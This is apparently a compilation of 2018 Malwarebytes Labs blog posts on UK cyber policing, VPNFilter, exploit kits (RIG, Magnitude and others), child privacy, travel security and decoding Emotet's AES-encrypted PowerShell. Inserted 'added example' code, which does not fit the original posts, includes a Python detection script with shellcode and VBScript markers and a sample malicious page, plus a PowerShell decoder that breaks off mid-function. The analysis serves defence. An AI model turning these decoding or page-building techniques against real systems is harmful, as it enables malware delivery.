The Security Blog From Malwarebytes

UK law enforcement: an uphill struggle to fight hackers

Fri, 06/15/2018 - 19:02

About 16 years ago in the UK, I walked into a local police station to report a computer crime, because walking into local police stations is how they did things back then. There may well also have been penny farthing bicycles, real pea souper fogs, Mary Poppins, and Jack the Ripper, though I could well be wrong on those last two.

I was greeted at the incident report desk by a bemused officer on duty more used to dealing with stolen bikes or children stuck up trees than anything hacker related, and things went rapidly downhill from his very first question, which was, “What’s an Internet?”

The early days of UK law enforcement and the Internet

I can’t speak for everyone with my solitary anecdote, but even countries that had law enforcement bodies a bit more on the ball with regard to all things cyber had their problems, too. I vividly remember being asked to help [redacted entity] with something I’d researched sometime between 2005–08 (being deliberately vague here), resulting in a face-to-face meeting with someone I was half convinced was going to drag me off to a cell. I was helping! You asked me if I could help you! Sadly, I can’t say feelings of reciprocal assistance were fostered in any great way, and that’s a shame.

Outside of my own experiences, many security researchers were working in almost total isolation; you couldn’t get ahold of security contacts for major social networks, nobody was on Twitter, huge organisations were missing “contact us” pages, and you were doing very well indeed if you managed to get a dialogue going with, well, pretty much anybody. All communication was done via yelling in blog comments and trying to figure out which people were at security conference dinner queues.

In short, you had hardly anyone talking, vaguely scary law enforcement with technical chops but a general lack of people skills, and officers ready and willing to ask you, “What’s an Internet?”

Frankly, I’m amazed the Internet didn’t burn down into a hole in the ground.

The present day

Things are significantly better now, and many of those problems have been addressed. We have every researcher you can think of available at short notice on sites like Twitter, we have bug bounties/halls of fame, ISPs are a lot more communicative, public facing clearing houses of malware/phishing pages, and most branches of law enforcement have a much better understanding of all things digital.

That’s not to say problems don’t exist, however. A recent report claims British law enforcement is having a tough time of it. If you’ve run into a cyberattack of some kind in the UK, you may find yourself out of luck, because apparently only one in three of the 44 police forces in operation is able to deal with computer crime. While police claim some 90 percent of all crime has a digital element to it, their ability to flesh out so-called “cyber units” has been found to be lacking.

Into this already problematic area follows the frequently muddled response to forms of encryption and data privacy. The recent National Crime Agency report on Serious and Organised Crime walked a fine line between acknowledging privacy boons for regular web users, while pointing out the advantage to criminals.

That’s not really a popular line of attack, as it turns out, because the UK government has a thing for wanting to backdoor forms of encryption—and people aren’t really keen on backdoored encryption. Or how about the urge to move into the facial recognition realm, despite a false positive rate of 98 percent? On top of all that, we have this killer quote from a symposium on privacy and corporations:

Tesco probably knows more about me than GCHQ.

While admittedly tongue in cheek, it does raise questions about how much, exactly, we surrender when signing up to membership cards, loyalty accounts, and everything else along the way. Law enforcement would love to get their hands on that kind of profiling, and surveillance capitalism can have major ramifications for societies as a whole.

Essentially, things sound like they’re locked into a stalemate, and no sign of relief seems to be coming anytime soon. And if law enforcement actually is struggling to keep up with datasets and tracking information available to corporations, it’s natural that they’re going to insist on access to all the things, all of the time. At which point, people get rather angry and the cycle repeats itself. Meanwhile, in all of this, the criminals are getting away with all sorts of things.

Wanted: a huge pile of cash

Funding is the be all, end all of UK policing, but with cuts across the board and real-world police numbers down, it’s a hard sell to grab some cash for Internet shenanigans, especially when nobody seems to be entirely clear on what they want to do. Train more police in forensics? DDoS analysis? Malware reversing? Which type of digital attack is likely to be most relevant to the type of police work most commonly seen in the UK? Or, do they want to leapfrog all of that and just go all out on the “Encryption is good for bad people so we definitely want backdoors, thanks” approach?

Who knows, but considering the UK has only pumped £1.3 million into cybercrime training in the last three years, it leaves a lot to be desired. The cash is split between different regions, and that doesn’t go far—as the linked article mentions, North Wales spent £360 on 1,063 individuals to get them trained up from a total pot of £375,448. Meanwhile, there are some regions where a grand total of zero people were trained in aspects of computer crime over a period of three years (perhaps the “What’s an Internet?” officer resides there).

Backup en route

It’s not all bad news. If you could go back in time 16 years and tell me that UK law enforcement would be spending a million pounds on computer crime training, I’d probably be laughing in disbelief until 2018 rolled back around.

Nowadays, there are plenty of ways to reach the police online and across a variety of social media. Local and national police websites will often play host to infographics—actual infographics—with useful information on them and everything! There is, at least, money still being invested in the nation as a whole as far as cyberattacks are concerned, to the tune of £1.9 billion over five years to tackle high-level malicious activity.

Even accounting for this, I get the feeling that a bit more money sent to police officers would probably help home users and businesses feel a little more secure and, hopefully, a bit more optimistic that their low-level report to an officer manning the admin desk won’t end up in a large pile of “dunno, lol.”

Imagine a world in which a cyberattack on a home user would result in a phone call to police that actually gets answered and actually gets results. Perhaps it’s only another 16 years away.

The post UK law enforcement: an uphill struggle to fight hackers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

VPNFilter malware still making waves

Wed, 06/13/2018 - 16:15

Last month, a piece of malware called VPNFilter caused chaos for owners of MikroTik, Linksys, TP-Link, and Netgear equipment. Roughly 500,000 devices worldwide fell victim, with the unwanted parasite able to listen to traffic, steal credentials, damage devices, and more. Until patches started to roll out, the options weren’t great; as one of our researchers, Jovi Umawing, told SCMagazine recently:

“While Ukraine has been a key target of destabilising cyberattacks for some time now, this particular infection is unlikely to cause issues with the Champions League final. The bigger concern is what people do to combat potential infection; restoring routers to factory settings may eliminate the malware, but it also opens the possibility of becoming vulnerable to older exploits. The best course of action at this point in time is to purchase new hardware, if at all possible.”

That’s right, people were very worried about their football match. And due to the lack of available patches at the time, people were left with the option of running out and buying a new router or sitting around inviting multiple pre-existing, vampire-style exploits over the threshold.

As it turns out, there’s a lot more to consider than who’d end up winning the Champions League, because not only is the threat still around, but it’s also slowly ramping up the problem factor.

VPNFilter: Not gone, and not forgotten

This month, it was revealed the threat was potentially worse than everyone thought, with the ability to attack endpoints otherwise safely hidden behind a firewall. Worse, the number of infected devices has risen from 500,000 to close to one million across 54 countries.

Did you breathe a sigh of relief when initial findings suggested it was “only” 15 to 20 types of router affected, none of which were yours? Well, you might want to stop, because more than 50 others have now been added to the list. A full list can be viewed on the main Talos Intelligence information page.

Make no mistake, VPNFilter malware is highly unpleasant—you don’t want it lurking on your router while it tries to (for example) downgrade HTTPS communications to something unencrypted so it can swipe sensitive data, or snag a list of visited domain names. Everything that goes in and out of a router could potentially be manipulated, so we need to ensure that we do all we can to keep it at bay.

My router is on the list, help!

First things first: don’t panic. One million devices compromised is a big number, but there are quite a few more than one million routers out there worldwide. The odds of having this ferreting away on your hardware are likely still low. What you need to do is ensure your vendor has rolled out an update to their firmware, and apply it.

Not every device installs updates without user interaction, and you may have to dig around on the product website. This is somewhat rare these days, from my experience at least. At most, you may be redirected or face a pop-up telling you to get on with things and give consent to an update.

Worst case scenario, no patch is available, and you’re stuck between deciding whether to risk sitting around with VPNFilter on your box, or rolling everything back to factory reset condition and potentially being vulnerable to older exploits.

Something to keep in mind is that router features can vary wildly, even when faced with two devices from the same manufacturer. Here’s how a basic bit of updating from Netgear works, for example, but some routers I’ve dealt with can be an absolute mess of poorly laid out tabs and menus which lead nowhere. Keep a search engine handy along with a pen and paper, just in case.

Routers should come out of the box running everything required to keep you and your data secure, but even then, you’ll probably find default logins all over the place. If nothing else, VPNFilter may have inadvertently caused us all to go back and shore up the security of our magical Internet boxes in a more general fashion. Even if VPNFilter never existed, you’ll still probably want to take advantage of secure logins, killing off unwanted services, optimising firewalls, and maybe even turning it off while out to reduce your target size and also save a bit of electricity in the bargain.

It’s not over yet…

Dealing with router issues can be worrying—even those familiar with locking down every aspect of a desktop might not have the faintest idea about the blinky-light box in the corner of the room keeping the traffic moving. That’s perfectly understandable, so don’t feel bad about it. As you can see from the links up above, there are plenty of resources to sink your teeth into. You can bet that more VPNFilter antics will be in the news over the coming weeks, so keep up to date with the latest happenings. And if your router should end up on one of the affected devices lists, contact your supplier as soon as you possibly can.

Exploit kits: Spring 2018 review

Tue, 06/12/2018 - 19:04

Since our last report on exploit kits, there have been some new developments, with the wider adoption of the February Flash zero-day as well as the inclusion of a new exploit for Internet Explorer. We have not seen this many changes in the drive-by landscape for a long time, although these changes are the by-product of exploit development closely tied to malspam campaigns and exploits embedded within Microsoft Office.

Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits. While Internet Explorer is not getting any younger, CVE-2018-8174 brings an update to an otherwise 2-year-old vulnerability (CVE-2016-0189), which is still used in some drive-by campaigns. As far as Flash is concerned, CVE-2018-4878 has been adopted by almost all exploit kits. At the time of this writing, a newer Flash vulnerability (CVE-2018-5002) is available but has not been spotted in any EK so far.

RIG

RIG exploit kit remains the most commonly observed EK in the wild, with several different campaigns in action. RIG was the first to include the new VBScript engine exploit (CVE-2018-8174) in IE only days after a Proof of Concept became publicly available, on top of adding CVE-2018-4878. RIG has pushed various payloads such as Bunitu, Ursnif, and the popular SmokeLoader.

GrandSoft

GrandSoft is an IE-only exploit kit which is observed in a smaller range of distribution campaigns, mostly via malvertising on adult sites. In comparison to its counterparts, GrandSoft is still relying on the older Internet Explorer exploit (CVE-2016-0189) and lacks the obfuscation we normally see in landing pages. Some payloads pushed by GrandSoft include the AZORult stealer.

Magnitude

The South Korea–focused Magnitude exploit kit is back to using its trusted Magniber payload after having a short stint with GandCrab ransomware. Magnitude added Flash (CVE-2018-4878) and went on to integrate IE’s CVE-2018-8174 after a hiatus of about a week with no activity. With its own Magnigate filtering, Base64-encoded landing page and fileless payload, Magnitude is one of the more sophisticated exploit kits on the market.
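One way to triage a Base64-wrapped landing page of the kind described above (and to see why GrandSoft’s unobfuscated pages are easier to catch), as an added example written for this review rather than Malwarebytes tooling or any exploit kit code; the page it scans is a constructed stand-in, and the marker list is an assumption about what the decoded content would contain:

```python
"""Static triage of an exploit-kit landing page that hides its content in Base64.

Added example, not code from Malwarebytes or from any exploit kit: landing
pages such as Magnitude's are Base64-encoded, so a plain string scan of the
HTML never sees the <object> or VBScript markers it would catch on an
unobfuscated page like GrandSoft's. The script decodes every long Base64 run
in a page and reports the decoded chunks that carry markers of the Flash
(CVE-2018-4878) and VBScript/IE (CVE-2018-8174) delivery paths discussed above.
The sample page below is constructed for the demo, not a real EK capture.
"""
import base64
import binascii
import re
from typing import Dict, List

# Markers (an assumption for the demo) that point at the delivery paths above.
MARKERS = {
    "flash_object": re.compile(r"application/x-shockwave-flash|\.swf\b", re.I),
    "vbscript": re.compile(
        r"type\s*=\s*[\"']?text/vbscript|<script[^>]*language\s*=\s*[\"']?vbscript", re.I
    ),
    "activex": re.compile(r"ActiveXObject", re.I),
    # Long runs of %uXXXX escapes are the classic unescape()'d shellcode buffer.
    "shellcode_escapes": re.compile(r"(?:%u[0-9a-f]{4}){8,}", re.I),
}

# A run of 64 or more Base64 alphabet characters, optionally padded.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def decode_base64_runs(page: str) -> List[str]:
    """Return every decodable Base64 run in the page as latin-1 text.

    Hex strings (hashes, IDs) also match the Base64 alphabet; they decode to
    byte noise that matches no marker, and runs with an impossible length are
    rejected by validate=True, so neither produces false positives.
    """
    chunks: List[str] = []
    for match in B64_RUN.finditer(page):
        raw = match.group(0)
        raw += "=" * (-len(raw) % 4)  # restore padding the page may have trimmed
        try:
            decoded = base64.b64decode(raw, validate=True)
        except binascii.Error:
            continue
        chunks.append(decoded.decode("latin-1"))
    return chunks


def triage_page(page: str) -> Dict[str, List[str]]:
    """Map each marker name to the (truncated) texts in which it was found.

    The raw page is checked as well as the decoded chunks, so an unobfuscated
    landing page is still flagged.
    """
    hits: Dict[str, List[str]] = {name: [] for name in MARKERS}
    for text in [page] + decode_base64_runs(page):
        for name, pattern in MARKERS.items():
            if pattern.search(text):
                hits[name].append(text[:60])
    return {name: found for name, found in hits.items() if found}


# Constructed sample: a decoy ad page whose real content arrives via atob().
INNER_HTML = (
    '<object type="application/x-shockwave-flash" data="/banner/ad.swf"></object>'
    '<script language="VBScript">Set sh = CreateObject("WScript.Shell")</script>'
)
SAMPLE_PAGE = (
    "<html><body><p>Loading advertisement...</p>\n"
    '<script>document.write(atob("'
    + base64.b64encode(INNER_HTML.encode()).decode()
    + '"));</script>\n'
    # A 64-character hex string (placeholder, not a real sample hash) to show
    # that hash-like runs are decoded but do not trigger any marker.
    "<!-- " + "0123456789abcdef" * 4 + " -->\n"
    "</body></html>"
)

if __name__ == "__main__":
    for name, found in triage_page(SAMPLE_PAGE).items():
        print(f"{name}: {found}")
```

Run the file directly to see the decoded chunks that fired; a real capture would be fed in as the `page` argument of `triage_page`.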

GreenFlash Sundown

The elusive GreenFlash Sundown continues to strike via compromised OpenX ad servers. Although it is usually seen distributing the Hermes ransomware, 360 Total Security observed a cryptocurrency miner via several Chinese websites running a vulnerable OpenX version. The ad banner used by GF Sundown in this attack, as well as some we documented before, is a Korean language picture that hides CVE-2018-4878 using steganography.

A busy 2018

There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits.

So far, 2018 has been busier than usual with the discoveries of several directly applicable zero-days, and we can expect to see more in the coming months. For instance, we have already witnessed back-to-back Flash zero-days where attackers are capitalizing on ActionScript vulnerabilities.

We tested these exploit kits against Malwarebytes, and they were all blocked thanks to our signature-less anti-exploit engine.

Hashes for samples referenced in this post:


8CA1DEDCED7332AEDC94291F8DAA82E0837A1EFC612B581DD13165B29F2A6DBB 21358ACDEB60C456BC36B8E3481BF66CC5F4167D5994F097F71798341B9119FB 560031AC4C947B1E168704CA5E323BF00A801E2320E1F0FFFE08392179D38391 AC1FF2B2A18931C17A5D9D0305CE72CC69C1688DFC2BDF4BF74AA9E27123BFFD



Magnitude (dumped from memory with PE-Sieve)


GreenFlash (dumped from memory with PE-Sieve)


Internet Safety Month: How to protect your child’s privacy online

Tue, 06/12/2018 - 17:44

June marks the beginning of summer. It is also National Internet Safety Month.

This is the perfect time to remind vacationers that while it is essential to check that everything you need is packed and ready for a trip, it is equally vital for the family to take steps in securing their devices and their online footprint. We’re talking about managing online privacy and reputation—for you and especially for your children.

So to celebrate Internet Safety Month, we’ll be pushing out a two-part series tackling the concepts mentioned above. In part 1, we’ll be talking about online privacy geared toward kids and teens. So parents and guardians, whip out that pen and paper—or a note-taking app, if you like—and start taking notes.

It is essential we protect our children’s privacy online

Parents, you know this. When they were young, we trained our kids not to talk to strangers—unless they’re the police or someone on the line handling emergencies, such as a 911 dispatch officer. We tell them not to accept anything from anyone they don’t know or are unfamiliar with. We remind them not to wander off too far from where we can see them. We sternly order them not to go down dark alleyways. We encourage them to go places accompanied by a person we both trust.

It’s natural for parents and guardians to keep their child safe and as far away from physical harm as possible. That hasn’t changed, and is equally true for the digital world—especially when our kids have coexisting physical and digital lives.

What kids (and some adults) probably don’t realize is that there are real-world consequences for the things they do online. This is something we should keep reminding our kids about as they grow up. Truth be told, it’s relatively easy to forget what’s at stake if we can get what we want quickly and with relative ease. And more often than not, kids won’t think twice about giving personal info away.

If we don’t take our child’s online privacy seriously, they may end up in serious digital trouble, or worse: end up getting emotionally or physically harmed.

When it comes to criminals going after children’s personal details, identity theft is something that parents should worry about. The sites you navigate to may be child-friendly, but that doesn’t mean they take extra care of your child’s info (the same way other companies handle data of parents and other adults).

The security of these sites may or may not be terrible, but unfortunately, they lean mostly toward the former. Case in point: the VTech breach of 2015. Fortunately, the anonymous hacker who exposed flaws in the toy maker’s websites was motivated to stop anyone from taking advantage of parents’ and children’s data. The outcome might have been different had the data ended up in the hands of criminals.

Sharing too much information online, such as their current whereabouts and what they’re doing, is also dangerous to children, as this may invite stalkers and spies. Your child could also lose out on opportunities if they share compromising images of themselves publicly. Such photos could cost them a college admission, a new job, a grant or benefit claim eligibility, and other public and private services your child may want to apply for in the future. Furthermore, this could escalate to bullying, labeling, and humiliation.

What you can tell your kids to protect their privacy online

While most parents focus on personal privacy when it comes to online matters, remember that there is also what we call consumer or customer privacy. Your kids are already using and consuming services and software programs available online, whether they’re labeled free for use or not. This means that they also need to exercise the right to protect this type of privacy. Customer privacy centers on the data companies collect about their users, regardless of age, whenever users interact with their sites. Taking the steps we prescribe below can help address the security of your child’s personal and consumer privacy:

“There is information you can share and cannot share online about you, your friends, and other people around you.” Guide your kids on which information, videos, photos, or posts from others to share or not share. Your home address, the name of the school they attend, your landline number (if you, dear parent, still have one in the house), and email address are examples of data they should never share publicly online. On the other hand, safe selfies, cat pictures, and funny GIFs are harmless to share. The family recipe that has been passed on from generations before? Well, you may want to ask granny about that first.

Read: Users with landlines are more vulnerable to scams

“Timing is everything.” Yes, that age-old adage that has been uttered numerous times applies here, too. If and when your teen cannot avoid sharing information about where they are and what they’re doing, the very least they can do is delay posting about, say, being on a family holiday in the Maldives for a fortnight. This way, once you’re all back safe at home, not only is a potential burglary prompted by a social media post avoided, but your teen can still relive their experiences with friends online. In this way, it’s almost like extending the vacation fun a little bit longer.

“Check your social media settings or possible privacy policy changes you might suddenly be defaulted to.” Businesses that market to children are, by law, required to have a privacy policy included in their terms of service. Informing their young users is also compliant with Children’s Online Privacy Protection Act (COPPA) standards. However, due to activities that may keep the child busy and make them miss said notifications in time, it is good practice to make time to review online account settings on a regular basis.

“Familiarize yourself with laws that protect your online privacy.” Of course, parents should do this, first and foremost, before they can pass on what they know to their kids. Keep your language simple and understandable. Acquainting your kids with laws can also give them insights on what information, as consumers, they can share or withhold from companies that ask data from them. You can start with COPPA. Introduce them to online privacy laws governed by your home state, as well.

“I’ll walk you through the privacy settings of your social media accounts.” When you think your child is at the right age and ready to have a social media account, set one up together and spend as much time as you can walking them through and helping them understand the various privacy settings on offer for that particular platform. This may also be an excellent opportunity to offer them additional tips, if, for example, they receive friend requests from someone outside their circle.

“Read up on news about the platforms you use.” This is to foster awareness about what can potentially happen online if they’re not careful with their information.

Privacy, monitoring, and apps: A “tough love” story

Parents of young children often monitor their kids closely, minding every website they visit or every video game they play with others online. But for some parents of tweens and teens, continuing to do this may seem optional now. After all, they’re growing up to be more independent and getting savvier with their online habits. They know when to stay away from something, right? Some of these parents may even stop keeping tabs on their kids completely for fear of being labeled “creepy” and “weird.” Worse, they’d be called out for “violating their child’s privacy.”

It’s a parent or caretaker’s ethical, moral, and legal obligation to keep their children safe. And whether kids like it or not, this extends to their digital lives. So before a new smartphone or tablet is handed over, three things should have already been established: first, the parent or caretaker must assess that the child is mentally and emotionally mature enough to own and take responsibility for a device; second, there is open communication between parent and child about online activities; and, third, there is an agreement about expectations for how the device will be used, including amount of time and which types of sites will be visited.

Once the device is handed over, require that your child come to you immediately if she encounters something that seems fishy online. On the flip side, it’s important to establish trust between caretaker and child. It would be wise for parents to always ask their child’s permission first before looking through their devices. And when it comes to using monitoring apps, they should also inform their child before installing.

Children must realize that while they are dependents, they don’t get to keep their online (or other) activities 100 percent confidential. Depending on the circumstances, for example, if the parent’s instincts tell them something is off or their child might be in danger, sometimes privacy must be ignored in favor of keeping the child out of trouble.

Children must also realize that just because they get checked up on every now and then doesn’t mean their parents don’t trust them. More often than not, it’s the people they’re interacting with online that parents don’t trust. They can’t meet these people in person and determine their character for themselves. Plus, allowing your kid to go on the Internet is not the same as allowing your kid to hang out at the mall for a couple of hours. It is definitely not always a safe place—especially if the proper precautions aren’t adhered to. Children need extra care and proper guidance when it comes to navigating the Internet.

Let’s stop and talk a while

When it comes to managing a child’s digital life, both adult and child must work together toward the common goal of acceptable online privacy and general security. While there is technology available that can aid parents when it comes to looking after their children’s well-being online, these should only be treated as supplemental and not a replacement to a relationship grounded in good communication. Both parties must be open to one another about what’s troubling them and what makes them uncomfortable, without judgment. Doing otherwise may result in children closing their doors and choosing to talk to others instead of their parents when they have problems online. Parents must recognize this, too, and come up with better ways to communicate with their child.

Raising digital natives isn’t easy now, and will probably be even more difficult in the future. Soon, they’ll be wearing our shoes and raising children of their own—a second or third generation of natives. We can only guess what life will be like then. But until then, it is crucial for parents to consider normalizing the concept of online privacy protection for their own good, and for generations to come.

A week in security (June 4 – June 10)

Mon, 06/11/2018 - 16:02

Last week on Labs, we took a look at hidden mobile ads, the perils of social media spam, and how to shore up your landline defenses. We also took a deep dive into Emotet malware analysis, and gave you some summertime safety tips.

Stay safe, everyone!

Tips for safe summer travels: your cybersecurity checklist

Fri, 06/08/2018 - 15:00

Summer is just around the corner in the Northern Hemisphere, and with it comes vacation plans for many. Those looking to take some time away from work and home are likely making plans to secure their home, have their pets taken care of, and tie up loose ends at work. But how about securing your devices and your data while you’re away? Here are some things to take into consideration if you want to have a trip free of cyber worries.

Before you leave

Some of the things on your cybersecurity checklist can be taken care of before you leave. They include the following:

  • Make sure the operating systems and software on all the devices you are going to take along with you are up to date. Having to install updates while you are on the road can be a pain due to slow and unstable connections. Use your at-home Wi-Fi, which you know is secured with a password. (Right? If not—do that right away.)
  • You may want to take precautions to secure devices that you’ll be leaving behind in your workplace and home. If a burglar gets hold of your desktop, they should not be able to harvest any valuable data. All devices should be password protected (including the ones you are taking along with you).
  • Back up the valuable data on the devices you are bringing so that if you lose them, it won’t be a double disaster.
  • Do not announce the dates of your upcoming travel plans on social media. That’s a great way to alert criminals to case your house and break in during the time you’ll be gone. Post your travel pics when you get back. They will still be cool.
  • Disable the auto-connect options shortly before you leave and have your devices forget the network SSIDs in their lists. Threat actors can abuse these features for man-in-the-middle attacks.
  • If you have contactless debit and credit cards, get shields in which to store them so you can carry them around without leaking information.
  • Think twice about bringing a multitude of devices. The chances of anything getting damaged, stolen, or lost are much higher when you’re on the road.
  • Make sure your travel insurance covers all the devices and any other valuables you plan to take along.

While you are traveling

Travel plans can range from road trips to a nearby camping spot to flights to five-star beach resorts. Because of the wide range of travel options, some of the following advice may or may not apply:

  • If you park your car at the airport, obviously make sure no valuable devices are left behind. This is also a good time to disable the Bluetooth of your phone, because the car is probably the only useful Bluetooth connection you need. And when Bluetooth is off, it can’t be abused.
  • Airports and other waypoints on your travels will often offer public, free, and unprotected Wi-Fi. Consider the risks associated with them when you use them, or use a VPN to enhance the security by encrypting your connection.
  • If you need to use Wi-Fi at your hotel, make sure their connections are secured with passwords. And if you need to access sensitive material for work, set up VPN on your laptop beforehand.
  • Privacy screens make sure that only the person sitting straight in front of the screen can read what is on it. This can stop people from secretly watching what you are doing. Good privacy screens are easy to apply and are available for laptops and many handheld devices.
  • Don’t use public computers for sensitive Internet traffic. This certainly includes online shopping and any other financial transactions. While you are traveling, it’s safer to spend money at your destination instead of online.
  • If you use webmail to read your mail when you are away from home, keep in mind that this may be less secure than reading the mail in your favorite email client. Some webmail services have HTML enabled by default.
  • Use a fully updated anti-malware solution for all your devices. Malwarebytes has solutions for many operating systems and types of devices.
  • Since you may not want to take your laptop and every other device with you as you go sightseeing, make sure there is a safe place to keep the items left behind. Not every hotel safe is big enough for a laptop. Ask your hotel concierge if they have other options for securing devices. Simply leaving them behind in your room is not the safest move.

If you travel abroad

Some extra attention to detail may be required when you travel abroad.

  • Make sure you leave your country with your devices fully charged. You may need to use them for a while before you get another chance to recharge. You may also need different cables, power plugs, and adapters to charge your devices at your destination or at checkpoints along the way. Come prepared.
  • Not only the US, but also some other countries, will look at your social media accounts to find any information that could make you a less welcome guest. It might be prudent to remove any questionable comments rather than invite further scrutiny.
  • If traveling into the US from abroad, be prepared that you might be asked to hand over your device and your password to get in. Make sure there is nothing on it that you don’t want to be found; the simplest way to guarantee that is to travel with a device that holds only what you need for the trip.
When you get back

Back home safe and sound? Don’t rest yet. Check a few more things and then you can start posting online about your relaxing, fun, and incident-free vacation.

  • Update your anti-malware solution and run manual scans on your devices to check for any uninvited guests you may have picked up on the road.
  • If you bought devices abroad, check them for tampering and for pre-installed monitoring software before you connect them to your home network. In some countries, devices are sold with monitoring software pre-installed.
  • Check your bank account for any unexpected withdrawals or spending. Warn your bank or credit card provider if you suspect foul play or if you lost sight of your credit card at some point. It’s especially important to do this if you suspect your login credentials may have been stolen.
  • As an extra precaution, you may want to change the passwords that you used during your time away. If someone managed to get ahold of one during your trip, a changed password stops them from doing any damage with it.
Don’t let all this ruin the fun

While most of the things mentioned above are precautions we (should) take every day, they are not the first ones that come to mind when you are planning that awesome trip you have worked for all year. But as always, it’s better to be safe than sorry.

Recommended reading: 7 tips to stay cyber safe this summer

Safe travels!

The post Tips for safe summer travels: your cybersecurity checklist appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malware analysis: decoding Emotet, part 2

Thu, 06/07/2018 - 15:00

In part two of our series on decoding Emotet, (you can catch up on part 1 here), we’ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.

  • System.Runtime.InteropServices.Marshal: copies the decrypted contents of a SecureString into unmanaged memory and reads them back as a normal .NET string
  • SecureStringToBSTR: the Marshal method that performs that copy, producing a COM BSTR
  • ConvertTo-SecureString: converts the encrypted standard string back into a SecureString, decrypting it with the supplied key
Encryption and PowerShell

There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one of them, but it’s not what our malware uses. The Emotet downloader uses AES. Let’s look at how PowerShell chooses between the two.

If the data was encrypted with ConvertFrom-SecureString and NO key, PowerShell uses DPAPI by default. Such a blob can only be decrypted by the same user on the machine it was encrypted on, which is useless for malware that has to run on arbitrary victims.

If a key was supplied (-Key takes a byte array of 16, 24, or 32 bytes, selecting AES-128, -192, or -256), PowerShell uses AES, and the blob can be decrypted on any machine by anyone who has the key. The Emotet downloader takes this route, with the key hard-coded in the malware itself.

Code execution flow

In order to get to the encrypted code, we need to first understand the flow of execution. Let’s have a look at how the code is structured.

Code structure


From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.


Code analysis

Now that we have a usable code structure, we can move on to the next step.

The code above is looking for an encrypted data string that is then run through ConvertTo-SecureString to begin decryption.

We now have access to the encrypted data from the VBA.


We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.

Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.

For the purpose of this analysis, we’ll save it as encrypted_code.txt.

Now, we’ll pass it to a variable $vEncrypted:

$vEncrypted = [IO.File]::ReadAllText("absolute_path\encrypted_code.txt")

There are different ways to achieve the same result. Get-Content can also be used.

Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:

$vDecrypted = ConvertTo-SecureString -String $vEncrypted -Key $key   # $key: the [byte[]] hard-coded in the malware; the result is still a SecureString

NOTE: The malware authors would have previously used ConvertFrom-SecureString with a key (now hard-coded into the malware) to encrypt the data. We’re simply reversing the process to recover the plaintext code.

The last step is to marshal the SecureString into unmanaged memory and read the decrypted code back out as a normal string.

We’ll store the result in a variable to keep it clean and simple.

$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))

Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). Both copy the plaintext into an unmanaged buffer: SecureStringToBSTR produces a length-prefixed COM BSTR, SecureStringToGlobalAllocUnicode a plain null-terminated Unicode buffer, and PtrToStringAuto reads either one, so either method works here. In your own scripts, free the buffer afterward with ZeroFreeBSTR (or ZeroFreeGlobalAllocUnicode) so the plaintext doesn’t linger in memory.

That’s it. $vResult should now have the completely decrypted code with the payload URLs.

Step-by-step analysis

Now that we know the code flow, let’s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.

First of all, we’ll pass the encrypted code to the variable $vEncrypted:

As you can see below, the encrypted data has now been stored in our variable vEncrypted:

The next step now is to convert the encrypted data into SecureString by running it through ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable vDecrypted:

In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:

Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case, vResult:

It’s now time to print the output of the variable and look at the decrypted code!

We will further execute the code to extract the payload URLs and print them to console in a clean and nice way. As we can see in the code, variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.

All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.

We already have the network IOC. At this point, we can go home! But do we ever?
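
Here is the whole decryption procedure above as one reusable script. This is an added example, not code from the original post and not Emotet’s code. So that it runs offline without a sample, it first produces a keyed SecureString blob the same way the malware authors did (ConvertFrom-SecureString with a key), then decodes it exactly as described. The key, the stand-in plaintext, its URLs and the ‘@’ separator are all constructed for the example; PtrToStringBSTR is used in place of PtrToStringAuto, and the URL extraction uses a regex so it does not depend on the sample’s Split separator.

```powershell
# Added example: round-trips a constructed string through the keyed
# SecureString mechanism Emotet's downloader relies on, then decodes it the
# way the analysis above does. Nothing here is real Emotet code or data.

# 1. A hard-coded key, as Emotet embeds one. 16/24/32 bytes selects
#    AES-128/192/256. The value is an assumption for this example.
$key = [byte[]](1..32)

# 2. Constructed stand-in for the decrypted downloader code (not the real
#    thing): a URL list held in $ADCX and split on an assumed '@' separator.
$plain = '$ADCX = ''http://example.invalid/a/@http://example.invalid/b/''.Split(''@'')'

# 3. What the malware authors did: encrypt with a key (AES), not DPAPI.
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$blob   = ConvertFrom-SecureString -SecureString $secure -Key $key
$path   = Join-Path ([IO.Path]::GetTempPath()) 'encrypted_code.txt'
Set-Content -Path $path -Value $blob -NoNewline

# 4. The analyst's side: file -> SecureString -> unmanaged buffer -> string.
function Unprotect-KeyedSecureString {
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][byte[]]$Key
    )
    $vEncrypted = [IO.File]::ReadAllText($Path).Trim()
    # Still a SecureString at this point; the AES decryption happens here.
    $vDecrypted = ConvertTo-SecureString -String $vEncrypted -Key $Key
    $ptr = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted)
    try {
        # PtrToStringBSTR reads the length-prefixed BSTR; PtrToStringAuto, as
        # used in the post, also works on Windows PowerShell.
        return [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptr)
    }
    finally {
        # Zero and release the unmanaged copy of the plaintext.
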